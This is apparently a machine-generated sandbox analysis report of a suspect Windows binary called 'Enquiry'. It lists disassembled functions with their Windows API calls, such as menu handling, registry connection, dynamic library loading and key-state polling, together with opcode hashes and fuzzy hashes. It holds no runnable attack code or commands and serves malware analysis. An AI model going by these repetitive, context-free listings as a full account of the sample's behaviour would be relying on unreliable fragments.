                            Similarity
                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                            • String ID:
                            • API String ID: 442100245-0
                            • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                            • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                            • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                            • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                            APIs
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                            • _wcslen.LIBCMT ref: 0045F94A
                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                            • String ID: 0
                            • API String ID: 621800784-4108050209
                            • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                            • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                            • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                            • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • SetErrorMode.KERNEL32 ref: 004781CE
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • SetErrorMode.KERNEL32(?), ref: 00478270
                            • SetErrorMode.KERNEL32(?), ref: 00478340
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                            • String ID: \VH
                            • API String ID: 3884216118-234962358
                            • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                            • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                            • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                            • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                            APIs
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                            • IsMenu.USER32(?), ref: 0044854D
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                            • DrawMenuBar.USER32 ref: 004485AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Menu$Item$DrawInfoInsert
                            • String ID: 0
                            • API String ID: 3076010158-4108050209
                            • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                            • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                            • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                            • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                            • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$_memmove_wcslen
                            • String ID: ComboBox$ListBox
                            • API String ID: 1589278365-1403004172
                            • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                            • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                            • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                            • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Handle
                            • String ID: nul
                            • API String ID: 2519475695-2873401336
                            • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                            • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                            • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                            • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Handle
                            • String ID: nul
                            • API String ID: 2519475695-2873401336
                            • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                            • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                            • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                            • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                            APIs
                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • _wcsncpy.LIBCMT ref: 00401C41
                            • _wcscpy.LIBCMT ref: 00401C5D
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                            • String ID: Line:
                            • API String ID: 1874344091-1585850449
                            • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                            • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                            • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                            • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID: SysAnimate32
                            • API String ID: 0-1011021900
                            • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                            • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                            • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                            • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                              • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                              • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                              • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                            • GetFocus.USER32 ref: 0046157B
                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                            • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                            • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                            • __swprintf.LIBCMT ref: 00461608
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                            • String ID: %s%d
                            • API String ID: 2645982514-1110647743
                            • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                            • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                            • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                            • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                            • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                            • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                            • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                            APIs
                            • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                            • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Process$CloseCountersCurrentHandleOpen
                            • String ID:
                            • API String ID: 3488606520-0
                            • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                            • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                            • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                            • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ConnectRegistry_memmove_wcslen
                            • String ID:
                            • API String ID: 15295421-0
                            • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                            • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                            • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                            • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                            APIs
                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                            • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                            • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                            • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AddressProc$Library$FreeLoad
                            • String ID:
                            • API String ID: 2449869053-0
                            • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                            • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                            • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                            • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                            APIs
                            • GetCursorPos.USER32(?), ref: 004563A6
                            • ScreenToClient.USER32(?,?), ref: 004563C3
                            • GetAsyncKeyState.USER32(?), ref: 00456400
                            • GetAsyncKeyState.USER32(?), ref: 00456410
                            • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorLongScreenWindow
                            • String ID:
                            • API String ID: 3539004672-0
                            • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                            • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                            • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                            • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                            APIs
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Interlocked$DecrementIncrement$Sleep
                            • String ID:
                            • API String ID: 327565842-0
                            • Opcode ID: 9dc5377443ce6d6d6f4d2094a12b75972c96b6e0f004f6bf3202481cb4e98956
                            • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                            • Opcode Fuzzy Hash: 9dc5377443ce6d6d6f4d2094a12b75972c96b6e0f004f6bf3202481cb4e98956
                            • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
